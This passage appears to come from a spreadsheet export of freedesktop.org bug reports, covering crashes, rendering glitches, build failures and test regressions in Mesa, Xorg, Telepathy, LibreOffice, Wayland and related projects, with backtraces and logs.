IGT-Version: 1.8-gc049c39 (x86_64) (Linux: 3.18.0-rc3_drm-intel-fixes_dc54e7_20141110+ x86_64)
==Reproduce steps==
---------------------------- 
1. ./kms_mmio_vs_cs_flip --run-subtest setplane_vs_cs_flip</t>
  </si>
  <si>
    <t>XORG-14822</t>
  </si>
  <si>
    <t>nv11 is offset one line vertically with randr1.2</t>
  </si>
  <si>
    <t>Created attachment 14837
Xorg log file
When randr1.2 is enabled I get the display offset one line downwards (the whole screen is down by a single line and the line from the bottom is displayed at the top).
(for my own reference this is the green elsa gladiac mx nv11)
01:00.0 0300: 10de:0110 (rev a1)
01:00.0 VGA compatible controller: nVidia Corporation NV11 [GeForce2 MX/MX 400] (rev a1)</t>
  </si>
  <si>
    <t>DRI-58958</t>
  </si>
  <si>
    <t>Kernel crash: Error to handle paging request</t>
  </si>
  <si>
    <t>Created attachment 72395
Picture taken with camera showing the crash.
System crashes. Picture attached.</t>
  </si>
  <si>
    <t>h.judt</t>
  </si>
  <si>
    <t>TELEPATHY-30100</t>
  </si>
  <si>
    <t>Expose details dictionary in presencePublicationRequested signal.</t>
  </si>
  <si>
    <t>Currently the Tp::ContactManager::presencePublicationRequested() signal gives you a bunch of contacts but doesn't give you the details (such as the message).
The attached branch compiles but has not been tested at all.</t>
  </si>
  <si>
    <t>MESA-27939</t>
  </si>
  <si>
    <t>glapitable.h: No such file or directory</t>
  </si>
  <si>
    <t>I am trying to compile mesa master but I get an error:
gcc -c -I../../include -I../../src/mesa -I../../src/gallium/include -I../../src/gallium/auxiliary -O3 -fomit-frame-pointer -march=amdfam10 -Wall -Wmissing-prototypes -std=c99 -ffast-math -fvisibility=hidden -fno-strict-aliasing  -fPIC  -DUSE_X86_64_ASM -D_GNU_SOURCE -DPTHREADS -DHAVE_POSIX_MEMALIGN -DUSE_XCB -DUSE_EXTERNAL_DXTN_LIB=1 -DIN_DRI_DRIVER -DGLX_DIRECT_RENDERING -DGLX_INDIRECT_RENDERING -DHAVE_ALIAS -DHAVE_XEXTPROTO_71 -DFEATURE_GL=1 main/api_exec_es1.c -o main/api_exec_es1.o
main/api_exec_es1.c:34:49: fatal error: es/glapi/glapi-es1/glapi/glapitable.h: No such file or directory</t>
  </si>
  <si>
    <t>neotheuser</t>
  </si>
  <si>
    <t>EXEMPI-14049</t>
  </si>
  <si>
    <t>AC_CONFIG_HEADERS not found in configure.ac</t>
  </si>
  <si>
    <t>This warning message is reported building from head.
    ./autogen.sh --prefix /opt/gnome2
    autoheader: error: AC_CONFIG_HEADERS not found in configure.ac
    Running configure...
    ....
Don't break the configure stage but maybe is needed by recent auto* tools.</t>
  </si>
  <si>
    <t>TELEPATHY-32187</t>
  </si>
  <si>
    <t>Implement a simple SASL mechanism</t>
  </si>
  <si>
    <t>It'd be nice if tp-ssip supported X-TELEPATHY-PASSWORD so we could store SIP accounts without setting a password in MC. Here's a branch that uses a new helper I just wrote for tp-glib. I also merged a very similar haze branch recently.</t>
  </si>
  <si>
    <t>MESA-102680</t>
  </si>
  <si>
    <t>[OpenGL CTS] KHR-GL45.shader_ballot_tests.ShaderBallotBitmasks fails</t>
  </si>
  <si>
    <t>KHR-GL45.shader_ballot_tests.ShaderBallotBitmasks hits an assertion failure in the EU validator:
cts-runner: compiler/brw_reg_type.c:125: brw_hw_type_to_reg_type: Assertion `!not reached' failed.
It's trying to find an immediate of HW type 15.  This is compiling a SIMD8 VS.
I know Jason has a bunch of patches out related to ballot perhaps one of them fixes it?</t>
  </si>
  <si>
    <t>TELEPATHY-14623</t>
  </si>
  <si>
    <t>telepathy-butterfly crashed receiving offline message</t>
  </si>
  <si>
    <t>Original bug report: https://bugs.launchpad.net/ubuntu/+source/telepathy-butterfly/+bug/194381
Crashed immediately after logging in to my MSN account and I never see the waiting offline instant message.
Still able to chat to MSN buddies after the crash though
Traceback (most recent call last):
  File /usr/lib/python2.5/site-packages/pymsn/msnp/base.py line 106 in _dispatch_command
    handler(command)
  File /usr/lib/python2.5/site-packages/pymsn/msnp/notification.py line 486 in _handle_MSG
    self._client.oim_box.sync(mail_data)
  File /usr/lib/python2.5/site-packages/pymsn/service/OfflineIM/offline_messages_box.py line 247 in sync
    self.__parse_metadata(xml_data)
  File /usr/lib/python2.5/site-packages/pymsn/service/OfflineIM/offline_messages_box.py line 270 in __parse_metadata
    split('?')[3].decode('base64').encode('utf-8')
UnicodeDecodeError: 'ascii' codec can't decode byte 0xc2 in position 0: ordinal not in range(128)</t>
  </si>
  <si>
    <t>SPECIFICATIONS-11081</t>
  </si>
  <si>
    <t>reference to startup-notification env var is wrong</t>
  </si>
  <si>
    <t>the description of the StartupNotify key says:
    If true it is KNOWN that the application will send a remove message
    when started with the DESKTOP_LAUNCH_ID environment variable set.
it should be s/DESKTOP_LAUNCH_ID/DESKTOP_STARTUP_ID/</t>
  </si>
  <si>
    <t>XORG-22444</t>
  </si>
  <si>
    <t>[845] tiling broken with KMS</t>
  </si>
  <si>
    <t>When running a kernel without nomodeset all images (PNG etc.) and java applications come out with corrupted images. See attached. If I reboot with nomodeset everything works fine. I was told to submit a bug because this workaround won't be available in the future. Please note that no special acceleration options are being used (afaik) in my xorg.conf file. Taking snapshots of the screen also cause image corruption (see attached).</t>
  </si>
  <si>
    <t>erecio</t>
  </si>
  <si>
    <t>SYSTEMD-75680</t>
  </si>
  <si>
    <t>systemd-notify notifications often lost</t>
  </si>
  <si>
    <t>I have a shell script service here using systemd-notify for readiness and watchdog with NotifyAccess=all. In the journal I often see messages like systemd[1]: Cannot find unit for notify message of PID 9834 with subsequent watchdog timeouts by my service.
Is systemd trying to find out the unit of the notification sender but the sender (a forked systemd-notify) has already terminated?
Sometimes it even happens when the service is started so the READY message is lost.
I think this currently makes systemd-notify useless.
systemd 210</t>
  </si>
  <si>
    <t>FREEDESKTOP.ORG-38174</t>
  </si>
  <si>
    <t>Please create harfbuzz-indic mailing list</t>
  </si>
  <si>
    <t>Thanks!</t>
  </si>
  <si>
    <t>PULSEAUDIO-59294</t>
  </si>
  <si>
    <t>[PATCH] Updated Polish translation for pulseaudio</t>
  </si>
  <si>
    <t>Created attachment 72917
Updated Polish translation
Hi
As promised here is updated Polish translation for current master.</t>
  </si>
  <si>
    <t>DRI-100183</t>
  </si>
  <si>
    <t>[SKL] [BAT] kms_cursor_legacy/2x-cursor-vs-flip-atomic fails</t>
  </si>
  <si>
    <t>Created attachment 130198
log
Kernel drm-tip: 2017y-03m-13d-16h-06m-45s config 2327.
CPU: Celeron(R) CPU G3900
GPU: 00:02.0 0300: 8086:1902 (rev 06) (prog-if 00 [VGA controller])
The test fails 90% of the time.</t>
  </si>
  <si>
    <t>dorota.czaplejewicz</t>
  </si>
  <si>
    <t>PULSEAUDIO-52269</t>
  </si>
  <si>
    <t>ChangeLog: git-changelog.perl: command not found</t>
  </si>
  <si>
    <t>Please fix this.. at least for future releases.
 $ tar -Oxf pulseaudio-2.0.tar.xz pulseaudio-2.0/ChangeLog
/bin/sh: line 3: git-changelog.perl: command not found
git-changelog.perl failed.
 $ tar -Oxf pulseaudio-2.1.tar.xz pulseaudio-2.1/ChangeLog
/bin/sh: line 3: git-changelog.perl: command not found
git-changelog.perl failed.</t>
  </si>
  <si>
    <t>XORG-14673</t>
  </si>
  <si>
    <t>Corrupted output using textured video</t>
  </si>
  <si>
    <t>Created attachment 14567
Broken vs correct video
Hi
Using textured video I have two movie clips which gives corrupt output they work fine using regular overlay. One video is in WMV format and the other in Dirac.
Both MPlayer and GStreamer show the same problem all other videos I tried seems to work fine.
Attached is a screenshot of the corrupt video side to side with the correct output. If it's any help I can attach a short sample of the videos.
I'm using a R200 (Radeon 9100) card.</t>
  </si>
  <si>
    <t>LIBREOFFICE-68787</t>
  </si>
  <si>
    <t>FILESAVE: DOCX export: Footnote separator line problem</t>
  </si>
  <si>
    <t>Created attachment 84966
test documents
When I make a document and delete the footnote or endnote separator line (Format -&gt; Page -&gt; Length change 00%) and save DOCX.
In normal case the line vanish from my ODT document but in Word 2007 come back so not deleted.
Easy to reproduce: make a document with footnote after you delete the footnote save DOCX format.
Operating System: Windows 7
Version: 4.0.5.2 rc</t>
  </si>
  <si>
    <t>WAYLAND-56376</t>
  </si>
  <si>
    <t>configure doesn't catch missing GL/glu.h</t>
  </si>
  <si>
    <t>Output from make:
In file included from wscreensaver-glue.c:23:0:
wscreensaver-glue.h:44:20: fatal error: GL/glu.h: No such file or directory
I believe this should be caught by configure.  Error went away when I installed debian package libglu1-mesa-dev.</t>
  </si>
  <si>
    <t>XORG-47700</t>
  </si>
  <si>
    <t>[sna gm45] crash in sna_composite</t>
  </si>
  <si>
    <t>When running under KDE with the kde44-oxygen-molecule theme configured for GTK applications starting pavucontrol reproducibly crashes the X server.
Program received signal SIGSEGV Segmentation fault.
sna_composite (op=1 '\001' src=0x68db5b0 mask=0x0 dst=0x68db8c0 src_x=0 
    src_y=0 mask_x=0 mask_y=0 dst_x=0 dst_y=0 width=256 height=256)
    at ../xf86-video-intel-9999/src/sna/sna_composite.c:484
484     ../xf86-video-intel-9999/src/sna/sna_composite.c: No such file or directory.
        in ../xf86-video-intel-9999/src/sna/sna_composite.c
(gdb) bt
#0  sna_composite (op=1 '\001' src=0x68db5b0 mask=0x0 dst=0x68db8c0 
    src_x=0 src_y=0 mask_x=0 mask_y=0 dst_x=0 dst_y=0 width=256 
    height=256) at ../xf86-video-intel-9999/src/sna/sna_composite.c:484
#1  0x00000000005029a4 in damageComposite (op=1 '\001' pSrc=0x68db5b0 
    pMask=0x0 pDst=0x68db8c0 xSrc=0 ySrc=0 xMask=0 yMask=0 xDst=0 
    yDst=0 width=256 height=256)
    at /usr/src/debug/x11-base/xorg-server-1.12.0-r1/xorg-server-1.12.0/miext/damage/damage.c:569
#2  0x00000000004fb1ec in ProcRenderComposite (client=0x32e3670)
    at /usr/src/debug/x11-base/xorg-server-1.12.0-r1/xorg-server-1.12.0/render/render.c:722
#3  0x0000000000437a91 in Dispatch ()
    at /usr/src/debug/x11-base/xorg-server-1.12.0-r1/xorg-server-1.12.0/dix/dispatch.c:439
#4  0x00000000004264ca in main (argc= argv=0x7fff799cfbb8 
    envp=)
    at /usr/src/debug/x11-base/xorg-server-1.12.0-r1/xorg-server-1.12.0/dix/main.c:287</t>
  </si>
  <si>
    <t>WOCKY-35430</t>
  </si>
  <si>
    <t>Crash when disconnecting during authentication</t>
  </si>
  <si>
    <t>The SASL authentication code can assert in wocky_auth_registry_success_async_func() (priv-&gt;handler is NULL) if we get disconnected while authenticating. What I think is happening is:
* sasl_auth_stanza_sent() is called
* this calles wocky_xmpp_connection_recv_stanza_async() passing
  sasl_auth_stanza_received() as callback
* the connection gets disconnected
* cleanup happens
* after this we still receive the stanza
* sasl_auth_stanza_received is called
* we handle the stanze but things go wrong as we already did the cleanup.</t>
  </si>
  <si>
    <t>TELEPATHY-44056</t>
  </si>
  <si>
    <t>telepathy-gabble-xmpp-console mix GIR and pygtk</t>
  </si>
  <si>
    <t>Hi
telepathy-gabble-xmpp-console is calling this:
import pygtk
pygtk.require('2.0')
and then use introspection binding.
I think this are not needed anymore and can be dropped</t>
  </si>
  <si>
    <t>DRI-98971</t>
  </si>
  <si>
    <t>[BSW] Color management fails</t>
  </si>
  <si>
    <t>Created attachment 128308
bsw__kms_pipe_color__output
Hardware BSW: Acer Desktop
Motherboard: Aspire XC-704
CPU: Intel(R) Pentium(R) CPU N3700 @ 1.60GHz (Family 6 Model 76 Stepping 3)
GPU:  IntelÂ® HD Graphics - Intel Corporation Device 22b1 (rev 21)
Memory card: 1 card 4GB Hynix HMT451S6BFR8APB
HDD: Western Digital WDC WD10EZEX-21M (1TB)
Software:
Bios: R01-A2
Linux distribution: Ubuntu 16.04 64 bits
Kernel: 4.9.0-rc7 8f02d21 branch drm-tip from https://cgit.freedesktop.org/drm-tip
  commit 8f02d2103390e48e9e76c9e75d16dbb4396484c8
  Author: Jani Nikula 
  Date:   Mon Nov 28 14:38:48 2016 +0200
  drm-tip: 2016y-11m-28d-12h-38m-14s UTC integration manifest
libdrm-2.4.73-12 23d10b8 from git://anongit.freedesktop.org/mesa/drm
mesa: mesa-13.0.0 df1b0a5 from git://anongit.freedesktop.org/mesa/mesa
cairo 1.15.2 db8a7f1 from git://anongit.freedesktop.org/cairo
xorg-server-1.19.0-4 2de37eb from git://git.freedesktop.org/git/xorg/xserver
xf86-video-intel 2.99.917-736 bde9460 from git://git.freedesktop.org/git/xorg/driver/xf86-video-intel
libva-1.7.2-44 598fb9e from git://git.freedesktop.org/git/vaapi/libva 
vaapi-intel-driver: 1.7.2-189 ce55d7e from git://git.freedesktop.org/git/vaapi/intel-driver
intel-gpu-tools-1.16-164 7797517 from http://anongit.freedesktop.org/git/xorg/app/intel-gpu-tools.git
Steps:
------
1. Execute IGT test kms_pipe_clor
Actual results:
---------------
1. Tests are fail
Expected result:
-----------------
1. Tests are Pass
Info
-----
Tests are 100% Pass on APL KBL SKL BDW 
ctm-0 tests were failing on all platforms associated patchset: https://patchwork.freedesktop.org/series/12654/</t>
  </si>
  <si>
    <t>LIBREOFFICE-66691</t>
  </si>
  <si>
    <t>Librelogo toolbar is missing from menu</t>
  </si>
  <si>
    <t>Since commit 85f072ef33ef47b5e3e0bcd51acb5c4179cde2c2 Librelogo toolbar is not in the View - Toolbars menu. When LibreOffice is started there are warning messages:
warn:legacy.osl:11801:1:unotools/source/config/configitem.cxx:503: XHierarchicalNameAccess: AddonUI/OfficeToolBar/LibreLogo.OfficeToolBar/Title
/org.openoffice.Office.Addons/AddonUI/OfficeToolBar/LibreLogo.OfficeToolBar/Title
warn:legacy.osl:11801:1:unotools/source/config/configitem.cxx:503: XHierarchicalNameAccess: AddonUI/OfficeToolBar/LibreLogo.OfficeToolBar/ToolBarItems
/org.openoffice.Office.Addons/AddonUI/OfficeToolBar/LibreLogo.OfficeToolBar/ToolBarItems</t>
  </si>
  <si>
    <t>XORG-307</t>
  </si>
  <si>
    <t>Changes to freetype module break optimization heuristics on CJK fonts.</t>
  </si>
  <si>
    <t>The above URL points to an email thread discussing this issue.
Keith Packard suggested to pull a single glyph from the font to find out if it
gives back a bitmap or outline and base the decision wether to use the 'very
lazy' method based on this (under the assumption that if there is a bitmap for
one glyph there are bitmaps for all.
I would like to propose the following procedure:
- Implement the proposal from above and test it. 
If the results are bad:
   - Turn to the freetype people to add a way to obtain the required information
     thru the standard API.
   - For the short term reenable the old code for those who compile the .a 
     module using the builtin lib. Clearly mark this as a hack that will have</t>
  </si>
  <si>
    <t>TELEPATHY-27125</t>
  </si>
  <si>
    <t>Add support to QT_NO_CAST_FROM_ASCII</t>
  </si>
  <si>
    <t>Build should succeed if QT_NO_CAST_FROM_ASCII is defined</t>
  </si>
  <si>
    <t>LIBREOFFICE-67707</t>
  </si>
  <si>
    <t>crash processing keystroke with sidebar open</t>
  </si>
  <si>
    <t>Have an impress document open with the sidebar open create or load a new writer document - bang :-)
Thread 1 (Thread 0xb3f4c780 (LWP 21929)):
#0  0xb79144d4 in SfxDispatcher::IsLocked (this=0x0) at /data/opt/libreoffice/libreoffice-4-1/sfx2/source/control/dispatch.cxx:171
#1  0xb791655b in SfxDispatcher::Execute (this=0x0 nSlot=27014 eCall=6 pArgs=0x0 nModi=0 pInternalArgs=0x0)
    at /data/opt/libreoffice/libreoffice-4-1/sfx2/source/control/dispatch.cxx:1038
#2  0xad52c710 in sd::slidesorter::controller::SelectionFunction::KeyInput (this=0xa6ebe20 rEvent=...)
    at /data/opt/libreoffice/libreoffice-4-1/sd/source/ui/slidesorter/controller/SlsSelectionFunction.cxx:446
#3  0xad628b97 in sd::ViewShell::KeyInput (this=0x8dfb3c0 rKEvt=... pWin=0x8dfb538)
    at /data/opt/libreoffice/libreoffice-4-1/sd/source/ui/view/viewshel.cxx:457
#4  0xad61f59d in sd::Window::KeyInput (this=0x8dfb538 rKEvt=...) at /data/opt/libreoffice/libreoffice-4-1/sd/source/ui/view/sdwindow.cxx:252
#5  0xb6ca6715 in ImplHandleKey (pWindow=pWindow@entry=0x8696e60 nSVEvent=4 nKeyCode=1280 nCharCode=0 nRepeat=0 bForward=1 '\001')
    at /data/opt/libreoffice/libreoffice-4-1/vcl/source/window/winproc.cxx:1099
#6  0xb6ca8fcc in ImplWindowFrameProc (pWindow=0x8696e60 nEvent=5 pEvent=0xbfffe434)
    at /data/opt/libreoffice/libreoffice-4-1/vcl/source/window/winproc.cxx:2492
#7  0xb365cefe in SalFrame::CallCallback (this=0x8697120 nEvent=5 pEvent=0xbfffe434)
    at /data/opt/libreoffice/libreoffice-4-1/vcl/inc/salframe.hxx:243
#8  0xb36578d6 in GtkSalFrame::doKeyCallback (this=0x8697120 state=16 keyval=65293 hardware_keycode=36 time=1006131320 aOrigCode=0 bDown=
    true bSendRelease=false) at /data/opt/libreoffice/libreoffice-4-1/vcl/unx/gtk/window/gtksalframe.cxx:439
#9  0xb365c9bb in GtkSalFrame::signalKey (pEvent=0x807f600 frame=0x8697120)
    at /data/opt/libreoffice/libreoffice-4-1/vcl/unx/gtk/window/gtksalframe.cxx:3567
#10 0xb31b07b2 in _gtk_marshal_BOOLEAN__BOXED (closure=closure@entry=0x8668cb0 return_value=return_value@entry=0xbfffe620 
    n_param_values=n_param_values@entry=2 param_values=param_values@entry=0xbfffe690 invocation_hint=invocation_hint@entry=0xbfffe63c 
    marshal_data=marshal_data@entry=0x0) at gtkmarshalers.c:86
#11 0xb5f448c6 in g_closure_invoke (closure=0x8668cb0 return_value=return_value@entry=0xbfffe620 n_param_values=n_param_values@entry=2 
    param_values=param_values@entry=0xbfffe690 invocation_hint=invocation_hint@entry=0xbfffe63c) at gclosure.c:777
#12 0xb5f56b47 in signal_emit_unlocked_R (node=node@entry=0x80a6408 detail=detail@entry=0 instance=instance@entry=0x862c438 
    emission_return=emission_return@entry=0xbfffe76c instance_and_params=instance_and_params@entry=0xbfffe690) at gsignal.c:3584
#13 0xb5f5e9e3 in g_signal_emit_valist (instance=instance@entry=0x862c438 signal_id=signal_id@entry=42 detail=detail@entry=0 var_args=
    0xbfffe8b0 \334\350\377\277 var_args@entry=0xbfffe8ac ) at gsignal.c:3338
#14 0xb5f5ef23 in g_signal_emit (instance=instance@entry=0x862c438 signal_id=42 detail=detail@entry=0) at gsignal.c:3384
#15 0xb32e89cb in gtk_widget_event_internal (widget=widget@entry=0x862c438 [GtkWindow] event=event@entry=0x807f600) at gtkwidget.c:5017
#16 0xb32e8d0e in IA__gtk_widget_event (widget=widget@entry=0x862c438 [GtkWindow] event=event@entry=0x807f600) at gtkwidget.c:4814
#17 0xb31ae97c in IA__gtk_propagate_event (widget=widget@entry=0x862c438 [GtkWindow] event=event@entry=0x807f600) at gtkmain.c:2464
#18 0xb31aec40 in IA__gtk_main_do_event (event=0x807f600) at gtkmain.c:1685
#19 0xb30174c8 in gdk_event_dispatch (source=source@entry=0x8081b10 callback=0x0 user_data=0x0) at gdkevents-x11.c:2403
#20 0xb5e7e123 in g_main_dispatch (context=0x8081be0 context@entry=0x84f9ad8) at gmain.c:3054
#21 g_main_context_dispatch (context=context@entry=0x8081be0) at gmain.c:3630
#22 0xb5e7e4c0 in g_main_context_iterate (context=context@entry=0x8081be0 block=block@entry=0 dispatch=dispatch@entry=1 self=)
    at gmain.c:3701
#23 0xb5e7e5a1 in g_main_context_iteration (context=0x8081be0 may_block=0) at gmain.c:3762
#24 0xb36472e9 in GtkData::Yield (this=0x805bde0 bWait=true bHandleAllCurrentEvents=false)
    at /data/opt/libreoffice/libreoffice-4-1/vcl/unx/gtk/app/gtkdata.cxx:574
#25 0xb364779b in GtkInstance::Yield (this=0x805bd98 bWait=true bHandleAllCurrentEvents=false)
    at /data/opt/libreoffice/libreoffice-4-1/vcl/unx/gtk/app/gtkinst.cxx:405
#26 0xb6a52aee in ImplYield (i_bWait=true i_bAllEvents=false) at /data/opt/libreoffice/libreoffice-4-1/vcl/source/app/svapp.cxx:422
#27 0xb6a50878 in Application::Yield (i_bAllEvents=false) at /data/opt/libreoffice/libreoffice-4-1/vcl/source/app/svapp.cxx:456
#28 0xb6a508a9 in Application::Execute () at /data/opt/libreoffice/libreoffice-4-1/vcl/source/app/svapp.cxx:401
#29 0xb7f54a86 in desktop::Desktop::Main (this=0xbfffee2c) at /data/opt/libreoffice/libreoffice-4-1/desktop/source/app/app.cxx:1720
#30 0xb6a56990 in ImplSVMain () at /data/opt/libreoffice/libreoffice-4-1/vcl/source/app/svmain.cxx:162
#31 0xb6a56a62 in SVMain () at /data/opt/libreoffice/libreoffice-4-1/vcl/source/app/svmain.cxx:198
#32 0xb7f70c29 in soffice_main () at /data/opt/libreoffice/libreoffice-4-1/desktop/source/app/sofficemain.cxx:82
#33 0x080485ac in sal_main () at /data/opt/libreoffice/libreoffice-4-1/desktop/source/app/main.c:48
#34 main (argc=2 argv=0xbfffef54) at /data/opt/libreoffice/libreoffice-4-1/desktop/source/app/main.c:47</t>
  </si>
  <si>
    <t>MESA-33306</t>
  </si>
  <si>
    <t>[glsl] GLSL integer division by zero crashes GLSL compiler</t>
  </si>
  <si>
    <t>mesa: 2fb0aebd4a248d2a0725099cd5646253c30c1dc3 (master)
This fragment shader triggers a floating point exception in the Mesa GLSL compiler.
void main() {
   int a = 1 / 0
   gl_FragColor = vec4(0.0)
}
Program terminated with signal 8 Arithmetic exception.
#0  0x00ab1f89 in ir_expression::constant_expression_value (this=0x8e2e7e0) at ir_constant_expression.cpp:520
520		    data.i[c] = op[0]-&gt;value.i[c0] / op[1]-&gt;value.i[c1]
(gdb) bt
#0  0x00ab1f89 in ir_expression::constant_expression_value (this=0x8e2e7e0) at ir_constant_expression.cpp:520
#1  0x00acee3a in ir_constant_variable_visitor::visit_enter (this=0xbffae640 ir=0x8e2e630) at opt_constant_variable.cpp:117
#2  0x00ab8b9e in ir_assignment::accept (this=0x8e2e630 v=0xbffae640) at ir_hv_accept.cpp:276
#3  0x00ab8615 in visit_list_elements (v=0xbffae640 l=0x90522b8) at ir_hv_accept.cpp:48
#4  0x00ab85d4 in ir_hierarchical_visitor::run (this=0xbffae640 instructions=0x90522b8) at ir_hierarchical_visitor.cpp:282
#5  0x00acec5d in do_constant_variable (instructions=0x90522b8) at opt_constant_variable.cpp:161
#6  0x00aced25 in do_constant_variable_unlinked (instructions=0x8d621f0) at opt_constant_variable.cpp:191
#7  0x00aa9068 in do_common_optimization (ir=0x8d621f0 linked=false max_unroll_iterations=32) at glsl_parser_extras.cpp:731
#8  0x00a89bc3 in _mesa_glsl_compile_shader (ctx=0x8ced628 shader=0x8d58b78) at program/ir_to_mesa.cpp:2981
#9  0x00a38e1a in compile_shader (shaderObj=1) at main/shaderapi.c:854
#10 _mesa_CompileShaderARB (shaderObj=1) at main/shaderapi.c:1185
(gdb) frame 0
#0  0x00ab1f89 in ir_expression::constant_expression_value (this=0x8e2e7e0) at ir_constant_expression.cpp:520
520		    data.i[c] = op[0]-&gt;value.i[c0] / op[1]-&gt;value.i[c1]
(gdb) print op[0]-&gt;value.i[c0]
value has been optimized out
(gdb) print op[1]-&gt;value.i[c1]
value has been optimized out
(gdb) l
515		 switch (op[0]-&gt;type-&gt;base_type) {
516		 case GLSL_TYPE_UINT:
517		    data.u[c] = op[0]-&gt;value.u[c0] / op[1]-&gt;value.u[c1]
518		    break
519		 case GLSL_TYPE_INT:
520		    data.i[c] = op[0]-&gt;value.i[c0] / op[1]-&gt;value.i[c1]
521		    break
522		 case GLSL_TYPE_FLOAT:
523		    data.f[c] = op[0]-&gt;value.f[c0] / op[1]-&gt;value.f[c1]
524		    break</t>
  </si>
  <si>
    <t>WAYLAND-86993</t>
  </si>
  <si>
    <t>Crash when absinfo_x/y is nil</t>
  </si>
  <si>
    <t>Created attachment 110439
temporary patch to solve this issue
libinput SRCREV = 56b5f846ac7f8243da4ba2f288654becf1014c46
issue:
   Weston will crash when plugin a mouse device.
precondition:
   Define LIBINPUT_CALIBRATION_MATRIX in udev rules
crash point:
   crash happens in function evdev_device_calibrate() when calculate x/y scaler: 
   sx = device-&gt;abs.absinfo_x-&gt;maximum - device-&gt;abs.absinfo_x-&gt;minimum + 1
   sy = device-&gt;abs.absinfo_y-&gt;maximum - device-&gt;abs.absinfo_y-&gt;minimum + 1
   inside this calculation maybe the absinfo_x/y is nil then the access to maximum &amp; minimum value will aborted.
   even it is caused by the driver i thin libinput need to focus this case.
   see the attached patch for a temporary solution.</t>
  </si>
  <si>
    <t>starxforever</t>
  </si>
  <si>
    <t>XORG-16538</t>
  </si>
  <si>
    <t>Slow resizing of windows in kwin from KDE4</t>
  </si>
  <si>
    <t>Resizing windows in general is very slow in KWin4 with the NVidia driver. It takes up to 5 seconds until the window is fully repainted. This is with compositing enabled and disabled. Enabling the glyphcache helps a bit but it's still very sluggish.
http://bugs.kde.org/show_bug.cgi?id=160467
Also switching virtual desktop takes a couple of seconds depending on the number of windows. Activating a window can take up to one second as well. Should I file those lag issues as separate bug? On my notebook with an ATIx1300 this is all very snappy and smooth.
I'm using KDE's SVN trunk those problems have been there for quite some time. KDE3 on the exact same machine is very snappy.
Hardware is 7600GS 512MB dualhead 2*1280*1024. Driver version is 177.13 previous releases exhibit the same issues.
I've run Zack Rusin's xrenderbenchmark tool from http://people.freedesktop.org/~zack/xrenderbenchmark.tar.bz2 The tool shows that some operations are really fast others take thousand times longer. Running the benchmark on my nvidia system takes ~13 minutes on my ati one it takes less than 2.
I'm attaching 3 logs with this tool two on the nvidia system (w/ &amp; w/o glyphcache) one from the ati x1300 system for comparison.</t>
  </si>
  <si>
    <t>sebas</t>
  </si>
  <si>
    <t>LIBREOFFICE-65430</t>
  </si>
  <si>
    <t>[Template manager][UI] Double click does not open a template found by search function</t>
  </si>
  <si>
    <t>Problem description: 
Steps to reproduce:
1. open Template Manager....
2. use search templates to search among templates
3. try to use the searched template by doble clicking
Current behavior: template does not react
Expected behavior: a new file based on the template opens
Operating System: Ubuntu
Version: 4.0.0.0.alpha0+ Master
Last worked in: 3.6.6.2 release</t>
  </si>
  <si>
    <t>rlamsfuss</t>
  </si>
  <si>
    <t>MESA-54883</t>
  </si>
  <si>
    <t>Nvidia GLX560M: Display corruption in GTK+ apps and unable to wake from sleep</t>
  </si>
  <si>
    <t>I originally reported it in Gentoo Bugzilla:
https://bugs.gentoo.org/show_bug.cgi?id=429636
After switch from mesa-8.0.x to 9.0 snapshots or git master I have screen corruptions in GTK+ apps (two I use are Firefox and MySQL workbench). Furthermore after waking from suspend to RAM I see totally corrupted screen and non-responsive keyboard.
I'd gladly help in any way in resolving this. I just need to be instructed what kind of information may be useful and how to obtain them.</t>
  </si>
  <si>
    <t>kuba</t>
  </si>
  <si>
    <t>FONTCONFIG-19893</t>
  </si>
  <si>
    <t>Asturian orthography includes punctuation</t>
  </si>
  <si>
    <t>The Asturian orthography file contrary to most every other orthography file includes some punctuation symbols: @ ` Â¡ Â« Â» Â¿</t>
  </si>
  <si>
    <t>TELEPATHY-15673</t>
  </si>
  <si>
    <t>Chats should be unnamed</t>
  </si>
  <si>
    <t>MSN chat can become chatrooms at any time. So Text channels should have handle = handle_type = 0. Empathy 0.23.2 should be able to work with such chats.</t>
  </si>
  <si>
    <t>MESA-67963</t>
  </si>
  <si>
    <t>[llvmpipe] piglit glean pointAtten regression</t>
  </si>
  <si>
    <t>mesa: 637e6a0aa8e5920965a0720673e11622786e86ed (master)
$ ./bin/glean -t pointAtten --quick
PASS: 17550 antialiased combinations tested.
	FAILURE:
	Expected size: 9  Actual size: 0
	Size: 9
	Min: 1  Max: 11
	Attenuation: 1 100 100
	Eye Z: 0
	Smooth/antialiased
57cd3267782fcf92d1e7d772760956516d4367df is the first bad commit
commit 57cd3267782fcf92d1e7d772760956516d4367df
Author: Zack Rusin 
Date:   Tue Aug 6 20:24:26 2013 -0400
    draw: cleanup the extra attribs
    Before inserting new front face and prim id outputs cleanup
    the old extra outputs otherwise our cache will use previous
    output slots which will break as soon as outputs of the current
    shader don't match the last.
    Signed-off-by: Zack Rusin 
    Reviewed-by: Roland Scheidegger 
:040000 040000 621d0195174a3ea6eb39f4e7d4cc0439827863b0 5d515c665ac8a24bd364b0879a52f84d0b675bd0 M	src
bisect run success</t>
  </si>
  <si>
    <t>PACKAGEKIT-18157</t>
  </si>
  <si>
    <t>Error in Yum Fedora 10 beta</t>
  </si>
  <si>
    <t>Error Type: 
Error Value: Cannot retrieve repository metadata (repomd.xml) for repository: updates. Please verify its path and try again
  File : /usr/share/PackageKit/helpers/yum/yumBackend.py line 2098 in 
    main()
  File : /usr/share/PackageKit/helpers/yum/yumBackend.py line 2095 in main
    backend.dispatcher(sys.argv[1:])
  File : /usr/lib/python2.5/site-packages/packagekit/backend.py line 599 in dispatcher
    self.dispatch_command(args[0] args[1:])
  File : /usr/lib/python2.5/site-packages/packagekit/backend.py line 566 in dispatch_command
    self.search_name(options searchterms)
  File : /usr/share/PackageKit/helpers/yum/yumBackend.py line 333 in search_name
    self._do_search(searchlist filters key)
  File : /usr/share/PackageKit/helpers/yum/yumBackend.py line 304 in _do_search
    for (pkg inst) in res:
  File : /usr/lib/python2.5/site-packages/yum/__init__.py line 1593 in searchGenerator
    for sack in self.pkgSack.sacks.values():
  File : /usr/lib/python2.5/site-packages/yum/__init__.py line 591 in 
    pkgSack = property(fget=lambda self: self._getSacks()
  File : /usr/lib/python2.5/site-packages/yum/__init__.py line 434 in _getSacks
    self.repos.populateSack(which=repos)
  File : /usr/lib/python2.5/site-packages/yum/repos.py line 251 in populateSack
    sack.populate(repo mdtype callback cacheonly)
  File : /usr/lib/python2.5/site-packages/yum/yumRepo.py line 160 in populate
    if self._check_db_version(repo mydbtype):
